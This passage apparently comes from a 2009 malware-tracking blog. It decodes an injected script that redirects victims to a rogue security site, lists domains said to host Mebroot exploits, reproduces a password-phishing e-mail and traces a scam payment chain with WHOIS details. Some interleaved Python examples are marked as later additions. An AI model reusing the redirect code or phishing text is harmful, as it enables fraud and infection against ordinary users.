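    for name, idx, op, rhs in STMT_RE.findall(script):
        rhs = rhs.strip()
        if rhs.startswith("new Array"):
            arrays[name] = {}
            continue
        try:
            value = evaluate(rhs, variables)
        except ValueError:
            continue                       # loop counters etc.: not string state
        if idx:
            arrays.setdefault(name, {})[int(idx)] = value
        elif op == "+=":
            variables[name] = variables.get(name, "") + value
        else:
            variables[name] = value
    fragments = next(iter(arrays.values()))
    return "".join(fragments[i] for i in sorted(fragments))


def analyze(script):
    """Decode, then break the injected <script src> URL into its parts."""
    html = decode(script)
    src = re.search(r'src="([^"]+)"', html).group(1)
    u = urlparse(src)
    params = {k: v[0] for k, v in parse_qs(u.query, keep_blank_values=True).items()}
    return {"html": html, "host": u.hostname, "path": u.path, "params": params}


if __name__ == "__main__":
    result = analyze(OBFUSCATED)
    print(result["html"])
    print(result["host"], result["params"]["group"], result["params"]["seoref"])
```

Because the two referer-dependent values are filled in from FAKE_DOM, the same walker yields a request you can replay with whatever referer and HTTP_REFERER the next stage wants to see, which is precisely why gating on the referer buys them nothing.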


This gives us;


redir = 'http://securityscanavailable.com/hitin.php?land=30&affid=17008';
function handleErrorFn() { top.location = redir; }
window.onerror = handleErrorFn;
if (top.location.href != window.location.href) { top.location = redir; }


You can guess where this leads ....

quickstatistic.com = 74.50.98.121
securityscanavailable.com = 209.44.126.22

What these idiots don't seem to realize is that if the victim's browser has to load the file, we can load and analyze it too.

Comodo continues to ignore malware warnings ....

If there was ever any doubt that Comodo was deliberately failing to take action against these malicious sites, then I'm afraid you need to wake up, as Mike yet again provides absolute proof that Comodo is continuing, despite their claims, to help the bad guys.

http://msmvps.com/blogs/hostsnews/archive/2009/07/22/1705234.aspx

Tuesday, 21 July 2009

Bad Actors Part 7 - 3fn

“Wait … *beep beep* back up for a second, Alex. I heard 3fn was brought down by the FTC!”

That would be correct! On June 4th the FTC served a takedown notice that essentially dropped 3fn (aka “Triple Fiber Network”, Pricewert, APX Telecom, APS Communications) off the Internet. I was approached by law enforcement looking for evidence of malicious activities, and luckily, I was in the midst of writing up an article for my Bad Actors blog series. I decided to wait until a little time had passed before publishing details as not to tip off 3fn and possibly ruin an investigation. (Note that the investigatory group that approached me was at the federal level, but was not the FTC)

Below you’ll find my analysis of their IP blocks and a large amount of data about the Bad Actors whom they supported. Most of the links below are completely Not Safe For Work, possibly malicious, and frankly, many of them are disgusting in name as well as content. It’s not advised that you actually visit any of them. I also have more content that I didn't post, and if you're interested in it, feel free to drop me a line.

As I’ve been talking about in previous posts, there are many different aspects of a network infrastructure that a criminal needs to have in place to operate a successful organization. Let’s think about some of the pieces that need to be stable for a simple client-server SPAM botnet such as Cutwail, which was mainly hosted at 3fn.

First of all, you need to infect a user with the Cutwail malware. This malware could be delivered via a web exploit (such as one of the recent vulnerabilities in Adobe PDF, Office, Firefox, or DirectShow), via a social engineering attack (“You’re missing this video codec – press OK to install”), or possibly through other vectors like E-mail or IM. I’ve only seen Pushdo/Cutwail distributed through Exploits and Social Engineering, so let’s focus on those. First, you need to control the sites that are hosting exploits or malware, and you need to be able to redirect or otherwise get users to visit. 3fn was doing plenty of both the redirection, and the actual hosting, as I’ll detail below.


Read more
http://blog.fireeye.com/research/2009/07/bad-actors-part-7-3fn.html

Spambot Search Tool v0.35

Tomas from Tornevall has been in touch to let me know that, whilst spamtrap.tornevall.org was still queryable and listed on his site, it was actually abandoned some time ago. As such, I've removed it from the SBST routines and released a new version :o)

http://forum.hosts-file.net/viewtopic.php?f=68&p=12168#p12168

Download:
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Monday, 20 July 2009

Spambot Search Tool v0.34

Sorry for being so late in posting this here, but I released an update to the SBST yesterday. The main changes were two new DNSBLs (technically 3, but since 2 are run by the same site .....).

http://forum.hosts-file.net/viewtopic.php?f=68&t=1655

My friend Connie has pointed me to a potential problem with the inclusion of the Spamtrap RBL provided by Tornevall (spamtrap.tornevall.org), as it flagged her IP, which, considering she's had the same IP for 2 years, is a bit strange (I've advised her to contact them to query this).

If you experience the same with the spamtrap RBL (shown on the SBST web interface as "Tornevall (2)"), you may want to temporarily disable it.

It should be noted that Tornevall mention having different return values (though I'm not sure if this also applies to their spamtrap RBL). If I remember to, I'll try and get these included in the next release.

http://dnsbl.tornevall.org/index.php?do=usage
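The "different return values" are the way DNS-based blocklists work: the client reverses the octets of the IP, appends the list's zone and asks for an A record, and a listed address answers with a 127.0.0.x value whose last octet encodes the reason. The following is an added example, not code from SBST or from Tornevall: the return-code table and both resolvers are constructed (the real Tornevall meanings are on the usage page linked above), and it also shows the RFC 5782 sanity check (127.0.0.2 must be listed, 127.0.0.1 must not be) that catches an abandoned or wildcarded zone before it hands you a false positive like the one described above.

```python
"""DNSBL query construction, return-code interpretation and the RFC 5782
liveness check. Added example, not from the Spambot Search Tool; the
return-code table and the two resolver stubs are constructed for the demo."""
import ipaddress

# Constructed return-code table; every real list publishes its own meanings.
RETURN_CODES = {
    "127.0.0.2": "spam source",
    "127.0.0.4": "open proxy / relay",
    "127.0.0.8": "spamtrap hit",
}

# Constructed DNS stand-in for a healthy list: query name -> A records.
HEALTHY_LIST = {
    "2.0.0.127.dnsbl.example.invalid": ["127.0.0.2"],      # RFC 5782 test entry
    "4.3.2.1.dnsbl.example.invalid": ["127.0.0.2"],
    "100.1.168.192.dnsbl.example.invalid": ["127.0.0.8"],
}


def healthy_resolver(name):
    return HEALTHY_LIST.get(name, [])


def parked_resolver(name):
    """Models an abandoned zone that was wildcarded: every query 'is listed'."""
    return ["127.0.0.2"] if name.endswith(".dead.example.invalid") else []


def dnsbl_query_name(ip, zone):
    """Reverse the octets of an IPv4 address and append the list zone."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this example handles IPv4 only")
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def lookup(ip, zone, resolve):
    """Return (listed, reasons). An empty answer (NXDOMAIN) means not listed."""
    answers = resolve(dnsbl_query_name(ip, zone))
    reasons = []
    for a in answers:
        if ipaddress.ip_address(a) not in ipaddress.ip_network("127.0.0.0/8"):
            reasons.append(f"non-loopback answer {a}: zone is probably dead or hijacked")
        else:
            reasons.append(RETURN_CODES.get(a, f"listed with undocumented code {a}"))
    return bool(answers), reasons


def list_is_sane(zone, resolve):
    """RFC 5782: 127.0.0.2 must be listed and 127.0.0.1 must not be."""
    return lookup("127.0.0.2", zone, resolve)[0] and not lookup("127.0.0.1", zone, resolve)[0]


def check(ip, zone, resolve):
    """Only trust a listing from a zone that passes the sanity check."""
    if not list_is_sane(zone, resolve):
        return {"ip": ip, "zone": zone, "usable": False, "listed": None,
                "reasons": ["zone failed the RFC 5782 sanity check; ignore its answers"]}
    listed, reasons = lookup(ip, zone, resolve)
    return {"ip": ip, "zone": zone, "usable": True, "listed": listed, "reasons": reasons}


if __name__ == "__main__":
    # 203.0.113.5 is documentation address space; the other values are constructed.
    for ip, zone, resolver in [("1.2.3.4", "dnsbl.example.invalid", healthy_resolver),
                               ("203.0.113.5", "dnsbl.example.invalid", healthy_resolver),
                               ("203.0.113.5", "dead.example.invalid", parked_resolver)]:
        print(check(ip, zone, resolver))
```

Running the sanity check once per zone at start-up (rather than per lookup) is enough; a zone that fails it should be dropped from the rotation exactly as the abandoned spamtrap list was.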

hpHOSTS - UPDATED July 21st, 2009

The hpHOSTS Hosts file has been updated. There are now a total of 80,-66 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

Latest Updated: 21/07/2009 03:00
Last Verified: 21/07/2009 02:00

Download hpHosts now!
http://hosts-file.net/?s=Download

Mass removal + mass addition!

I'm happy to report that I have finished the final round of validation, and am currently in the process of removing over 3000 domains that have failed to resolve over a 5 day period. They will of course continue to be monitored, especially given a lot of them were associated with rogues, malware and exploits.

Which brings me to the additions: with special thanks to Anthony at MalwareURL for processing them and sending them to me, I've added 113 sites that are currently hosting Mebroot exploits.

Example:
http://vurl.mysteryfcm.co.uk/?url=737927

Analysis:
http://wepawet.cs.ucsb.edu/view.php?hash=458a7fa10b3e48340c72c8dc856fbeab&t=1248138822&type=js

The sites (DO NOT LOAD THESE IN A BROWSER!):

13negro.es
1957buickcarclub.com
433manager.net
abanicoscarbonell.com
abramgames.com
abruzzocountryhouses.com
academiajc.com
academytravel.net
ace-techauto.biz
acmpublishers.com
ac-talant.com
addis1.com
adinehtravel.com
adrianspainting.com
aeronetmx.com
afreshview.com
agrs.net
airflow.co.uk
airflow.com
albantajardines.es
aldo.com.hk
alessandrobenvenuti.net
alicechristov.com
allenpodell.com
allirelands.info
allschoolsarestrange.com
alltollz.org
alyas.it
anbuarchives.com
ancaeginocchio.it
andreolisrl.com
anghouse.com
angloven.org
animeadventurers.com
animeawardz.com
annunciromasexy.com
antoniossilktrees.com
anyexit.com
apartments-corvara.com
articolipubblicitari.it
corryville.org
finetraining.net
flashtek.ca
fomesa.com
fravaproducciones.com
freegroupvideo.us
fulleffectgospelministries.com
funsexworld.com
g-soft.ueuo.com
hentaidai.com
hovirinnankioski.com
icho-2.com
insert-coin.tv
joyeriaprieto.com
jsbtn.com
kidskeyboarding.com
kipiniak.com
kitchenexpo.com
kitexoteclub.com
kurdtelcom.com
latrivalente.com
lesboscorp.com
liliananeves.com
magicclean.com
milkonya.com
mobiletrenz.com
mobilmd.net
mojavetumbleweeds.com
moncayo.es
monkeydreams.net
moviesenlinea.com
myownsecretary.com
navarromusic.net
oloworms.co.uk
orangecrush.de
parfumautomata.com
pasionesflamencas.com
photographis.it
pointingpercy.com
portlotniczy.net
regalo-t.net
reichegger.com
reikisansfrontiere.com
salinaturda.eu
saraworld.com
schneider.hu
shanghaisisa.com
sherryswines.com
skposeidon.nu
sky-europe.net
snookerpoint.ae
stacgroup.net
stolppottery.com
strategicsimulations.net
studiodestasio.net
sushiartnet.com
szeplak-apartman.hu
tabcon.com
taco-mac.com
tereny.com
thick-click.com
tigey.net
tohentai.com
tpmrecords.com
transdalmau.com
tusolma.com
uniformesdibra.com
urbanjazz.org
urlcabin.com
vanessasbistro.com
vanmango.com
ventanademazatlan.com
yygrecords.com


hpObserver Resolution Results
http://hosts-file.net/misc/hpObserver_-_Mebroot_Exploits.html

Saturday, 18 July 2009

Anti-malware expert and CEO, Eugene Kaspersky, offers theory for stopping cybercrime

I've got my own theories on how we could disable most of the malware, but they would involve (in part) the upstreams such as Level3 shutting off major parts of the IP ranges involved, the government/police forces actually doing some damn work, and the hosting companies actually bothering to deal with this instead of fobbing you off (or just not replying at all in some cases) because "the customer always pays on time" (yep, they don't actually say this, but it doesn't take a genius to figure out that this is why a lot of them conveniently "ignore" it).

Anyway, I could ramble on forever about this, instead, back to the subject at hand.

I asked him to talk a bit about cybercrime and identity theft.

He mentioned how malware is exploding and cybercrime has become a big enterprise. And the cybercriminals seemed to have done well during the recent global financial meltdown.

One of the latest trends is ATM systems being infected with Trojans giving criminals total access to the money. In some cases the money is unlimited. And the truth is banks and ATM companies are in shock, they don’t know what to do.

I’m enlightened on how cybercrime is becoming more organized. Not like the mafia, but they are businesses whether small independent groups or individuals who trade and rent out their malware, each of these groups with a specific job, working together with the same goal in mind, stealing money. And they are making more and more of it. Many of them don’t know each other, so they work together through a “middle man” of sorts because of the lack of trust that is felt in this criminal environment.

He explains, “We are starting to see more and more cybercriminals targeting social networks because they are so popular. People are always online and they seem to trust everyone and everything in these social networks. They publish their personal information and they download.” He adds, “Simply don’t share your information.”


Read the full article
http://www.examiner.com/x-11905-SF-Cybercrime-Examiner~y2009m7d17-Antimalware-expert-and-CEO-Eugene-Kaspersky-talks-about-cybercrime

Kudos to Donna for the heads up :o)

http://msmvps.com/blogs/donna/archive/2009/07/19/anti-malware-expert-and-ceo-eugene-kaspersky-offers-theory-for-stopping-cybercrime.aspx

Friday, 17 July 2009

Paretologic vs MalwareURL

It seems that, instead of Paretologic picking on those that have had them blacklisted for years, they've decided to go after the new guy, which in this case is my friend Anthony at MalwareURL.

http://www.dynamoo.com/blog/2009/07/paretelogic-vs-malwareurlcom.html

Dear Paretologic, allow me to give you a hint as to why people blacklist you;

1. Your programs have been known to detect "threats" that are not present, on more than one occasion

2. Your RegCure program claims "problems" have been found that are actually not problems at all, and in some cases, will kill the system if the user removes them

3. You do not provide fully functional trials, just scanners that the user then has to pay for to remove whatever is found - this is a major black mark, especially when you require the user to pay for it using a system that YOUR PROGRAM HAS TOLD THEM IS INFECTED! (which, amongst other things, then leaves them open to ID theft and having their credit card details stolen)

4. You do not monitor your affiliates, allowing them instead to spam, scam and otherwise mislead users in order to peddle your programs (and yes, many of us have tried till we were blue in the face to notify you of this and get you to take action; you've seemingly ignored all reports I sent, which is why I ended up not bothering to send them anymore).

5. On the vast majority of your "affiliates'" sites, there is no mention made that the download is a SCANNER ONLY (and no, "Free Download" does not make it acceptable); in some of the cases I came across, it was listed as a free removal tool, something it quite clearly is NOT.

There is also no mention made that they are affiliates getting paid to peddle the program; instead they opt to try and make it look like a legit review (whilst we may not be fooled by that and can easily tell the difference, regular users are fooled quite easily by this).

These are just a few issues off the top of my head. Enigma Software Group got listed due to similar behaviour, so we'll be damned if we'll allow other companies to get away with it. Stop your affiliates spamming/scamming and otherwise misleading users, STOP requiring users to pay for something from a machine YOU have told them is infected, and perhaps we can talk.

I consider your company rogue - and because of the issues listed above, amongst others, have had your sites listed in hpHosts for as long as I can remember.

ClamWin serious F/P again

ClamWin has developed 2 new F/P's in the latest sig update, one not so serious and one very serious. If you've still not got ClamWin set to report only, I strongly urge you to do so;

C:\Program Files\NetMeeting\cb32.exe: Trojan.Waledac-389 FOUND
C:\WINDOWS\system32\dllcache\cb32.exe: Trojan.Waledac-389 FOUND
C:\WINDOWS\system32\dllcache\userinit.exe: Trojan.Agent-119464 FOUND
C:\WINDOWS\system32\userinit.exe: Trojan.Agent-119464 FOUND

As before, if you do have ClamWin quarantine these instead of reporting, you can restore them from the quarantine folder (just rename each file to remove ".infected" and put it back where it's supposed to be). If you have ClamWin automatically delete them (NO! NO! NO!), you'll need to restore them from the Service Pack files (you did download the ISOs for the SPs, right?).

These F/P's are occurring, in this case, on Windows XP (all versions) and Windows Server 2003 (all versions); ClamWin hasn't shown the same F/P's on my Vista machine yet.

Thursday, 16 July 2009

Michael Jackson Phishing Scam, featuring Comodo

Be on the lookout folks. Not only are the malthors using Michael's name to infect the living hell out of you, but it also seems they're using his name to try and scam as much money as possible out of you. The bad guys in this case are Digital Target Marketing (digitaltargetmarketing.com - 67.192.83.139), who are responsible for my receiving this;

memorabilia of Michael Jackson

Remember the king of pop with this limited lithograph <http://rdfpl.deckbond.com/djpzw/rkhdvbpf/>

Please Load Images <http://rdfpl.deckbond.com/djpzw/rkhdvbpf/>

________________________________

Please Load Images <http://ndfw.deckbond.com/lsrp/zwrkhsc/bpk/>


Which of course, leads you through;

http://rdfpl.deckbond.com/djpzw/rkhdvbpf/
http://www.online-processingcenter.com/MTAyNjh8MjYzN3wzNjgwNjh8djI=/r?a=2xactuk-071509%7E%7E450%7E%7Etest%7E%7E&p=2637&t=1
https://www.dpbird.com/click.track?CID=101881&AFID=55971&ADID=211389&SID=1227733787
https://www.freemjlitho.com/?mid=581614&a=55971&s=1227733787

You can see the Comodo certificate for freemjlitho.com both in the screenshot top left, and here

Which serves up:



Fill in your details here, and you're taken to:



Say yes to this, and you're taken to:



You get the idea ........ once they're finished trying to get you to buy everything and anything, you finally reach the payment confirmation page. Oh, and don't worry, they know you won't change your mind, which is why there's no "Yes, I really am sure I want you to help yourself to my credit card funds!" option.




Registrant:
Telebrands Corp.
79 Two Bridges Road
Fairfield, New Jersey 07004
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: FREEMJLITHO.COM
Created on: 10-Jul-09
Expires on: 10-Jul-10
Last Updated on: 10-Jul-09

Administrative Contact:
Corp., Telebrands ekrueger@telebrands.com
79 Two Bridges Road
Fairfield, New Jersey 07004
United States
(973) 244-5521 Fax --

Technical Contact:
Corp., Telebrands ekrueger@telebrands.com
79 Two Bridges Road
Fairfield, New Jersey 07004
United States
(973) 244-5521 Fax --

Domain servers in listed order:
NS.RACKSPACE.COM
NS2.RACKSPACE.COM

WhoIs server: whois.godaddy.com


But wait, we're not done quite yet. If we go back and load the deckbond.com root (vURL Results), we see a link that takes us to a URL on bestwhole.com, which eventually leads us to;

https://secure.subscriptionmarketinginc.com/wealthtools/new_offer4/index.php?sub=669&sub1=1227755047&sub2=

And yeppers folks, this is another phishing scam.



Domains involved:

deckbond.com - 209.51.140.94
rdfpl.deckbond.com - 209.51.140.94
ndfw.deckbond.com - 209.51.140.94
online-processingcenter.com - 209.90.119.12
dpbird.com - 67.208.135.148
freemjlitho.com - 72.3.187.150
bestwhole.com - 209.90.119.51 (Previously at: 72.32.107.97 - AmcoreRewards.com)
subscriptionmarketinginc.com - 69.93.15.212
secure.subscriptionmarketinginc.com - 69.93.15.212
digitaltargetmarketing.com - 67.192.83.139

I'm actually rather disappointed with this particular one, not just because they're using Michael's name to try and scam vulnerable fans, but also because, as a fan myself, I'd have loved a copy of the stuff they're "selling". Bleedin' figures.

Huge addition again ....

Thar be another huge addition, folks: 1319 new additions to the database. These come courtesy of my friend Gerhard at Clean-MX.de, and cover sites involved in malware, RFI, exploits etc.

hpObserver - Clean-MX Domains 16-07-2009
http://hosts-file.net/misc/hpObserver_-_CleanMX160709.html

Note that the hpObserver results do not include the URLs; you're best off getting those directly from Clean-MX;

http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen desc&response=alive

Dear e-mail user

Just received this in my inbox, and thought it was rather funny. Why, you ask? Well, first, this scammer evidently didn't bother taking the time to at least try and make the scam look legit, and second, other than "WEBMAIL E-mail messaging center", there's no company or website specified - something you're, err, meant to include if you're trying to scam users of a particular website or service.

I thought at first that the e-mail had just been converted to text by my e-mail client, but nope, it apparently arrived this way, in plain text, complete with the god-awful formatting.

Dear e-mail user,
This message is from WEBMAIL E-mail messaging center to all
our email account users. We are currently conducting a maintenance
exercise which is for upgrading our database and e-mail account center
Thisexercise involves the deactivation of dormant /unused/invalid email
accounts to make room for further upgrading.
To confirm the validity of your email and to prevent your account
from deactivation, you are advised to update it by proving us with
the following information to alexeifamily@cooperation.net
CONFIRM YOUR EMAIL IDENTITY BELOW
Email Username:
EMAIL Password:
Date of Birth:

Warning!!!
Account owners are expected to update their accounts within 10 working
days after receipt of this notice. Failure to comply with this notice
within the stipulated time will face the risk of loosing his or her
account.

Thanks for your co-operation!
Warning Code: VX2G99AAJ
Web Team
BETA!


The e-mail's headers show only a single fake Received From line, with the real originating IP being;

121.241.210.105 - 121.241.210.105.static-kolkata.vsnl.net.in (India, AS4755)
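As an added illustration (not from the original post), here is how the two checks in this write-up can be automated: walking the Received: headers bottom-up to find the originating IP behind whatever HELO name the sender claimed, and pulling out the "send your details to" address in the body whose domain doesn't match the From: domain. The sample message is constructed; the hostnames and the From: address are placeholders, and only the originating IP and the reply address come from the post.

```python
import ipaddress
import re
from email import message_from_string

# Constructed sample, modelled on the "Dear e-mail user" message above.
# Hostnames and the From: address are placeholders; an internal relay hop
# is stacked on top to show that private addresses are skipped.
SAMPLE_MAIL = """\
Received: from mx-in.example.invalid ([192.168.5.20])
\tby mailstore.example.invalid with LMTP; Thu, 16 Jul 2009 09:12:02 +0100
Received: from webmail.messaging-center.example (unknown [121.241.210.105])
\tby mx-in.example.invalid with SMTP; Thu, 16 Jul 2009 09:12:01 +0100
From: WEBMAIL E-mail messaging center <webteam@messaging-center.example>
To: user@example.invalid
Subject: Dear e-mail user

Dear e-mail user,
To confirm the validity of your email and to prevent your account
from deactivation, you are advised to update it by proving us with
the following information to alexeifamily@cooperation.net
"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HELO_RE = re.compile(r"^\s*from\s+(\S+)", re.IGNORECASE)
ADDR_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

def originating_hop(raw):
    """Walk Received: headers oldest-first and return (claimed HELO name, IP)
    for the first hop with a public IP, skipping internal relays. The HELO
    name is untrusted sender input; the IP is what the relay actually saw."""
    msg = message_from_string(raw)
    for hdr in reversed(msg.get_all("Received", [])):
        m = IP_RE.search(hdr)
        if not m:
            continue
        ip = ipaddress.ip_address(m.group(1))
        if ip.is_private or ip.is_loopback or ip.is_reserved:
            continue
        helo = HELO_RE.match(hdr)
        return (helo.group(1) if helo else None, str(ip))
    return None

def reply_addresses(raw):
    """Return body addresses whose domain differs from the From: domain -
    the 'reply with your password' address this kind of scam relies on."""
    msg = message_from_string(raw)
    from_dom = msg.get("From", "").rsplit("@", 1)[-1].rstrip(">").lower()
    found = ADDR_RE.findall(msg.get_payload())
    return sorted({a for a in found if a.rsplit("@", 1)[1].lower() != from_dom})
```

Run against a real message, the returned IP is the one to look up (reverse DNS, ASN), as done for the Kolkata address above, while the HELO name is only useful as evidence of spoofing.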

The e-mail address they want you to respond to is alexeifamily@cooperation.net, a Brazilian website hosted at 80.80.229.46 (AS21217 - CH-SAFEHOST, PTR: www.cooperation.net), though unless I'm mistaken, it appears to be a French free e-mail account provider? (pretty weird considering its WhoIs references Brazil and Switzerland - not France).

domain: cooperation.net
reg_created: 1998-06-26 00:00:00
expires: 2010-06-25 04:00:00
created: 2001-06-24 11:55:40
changed: 2009-06-05 00:44:50
transfer-prohibited: yes
ns0: host-246.netzwirt.ch
ns1: host-247.netzwirt.ch
owner-c:
nic-hdl: TB100-GANDI
owner-name: Ynternet.org
organisation: Ynternet.org
person: Theo Bondolfi
address: "Fondation Ynternet.org \r\nch. de la branche 17"
zipcode: 1091
city: Grandvaux
country: Switzerland
phone: +41.213113047
fax: ''
email: 95c429c7b960758514471a4a1e2e9110-40616@contact.gandi.net
lastupdated: 2009-03-17 17:02:56
admin-c:
nic-hdl: TB100-GANDI
owner-name: Ynternet.org
organisation: Ynternet.org
person: Theo Bondolfi
address: "Fondation Ynternet.org \r\nch. de la branche 17"
zipcode: 1091
city: Grandvaux
country: Switzerland
phone: +41.213113047
fax: ''
email: 95c429c7b960758514471a4a1e2e9110-40616@contact.gandi.net
lastupdated: 2009-03-17 17:02:56
tech-c:
nic-hdl: AT1908-GANDI
organisation: ~
person: Antonio Terceiro
address: 'Rua Teixeira Barros, 800 apt 707B'
zipcode: 40279080
city: Salvador
country: Brazil
phone: +55.7133312299
fax: ''
email: d0a1291416fae0c9b419960cdf5f4fb4-822167@contact.gandi.net
lastupdated: 2009-04-16 15:44:25
bill-c:
nic-hdl: TB100-GANDI
owner-name: Ynternet.org
organisation: Ynternet.org
person: Theo Bondolfi
address: "Fondation Ynternet.org \r\nch. de la branche 17"
zipcode: 1091
city: Grandvaux
country: Switzerland
phone: +41.213113047
fax: ''
email: 95c429c7b960758514471a4a1e2e9110-40616@contact.gandi.net
lastupdated: 2009-03-17 17:02:56


WhoIs server: whois.gandi.net


I'm actually surprised that this e-mail address is only known to one anti-phishing project (at the time of checking, the only two listed in the results led to this one);

http://www.google.co.uk/search?hl=en&q=%22alexeifamily@cooperation.net%22&meta=&aq=f&oq=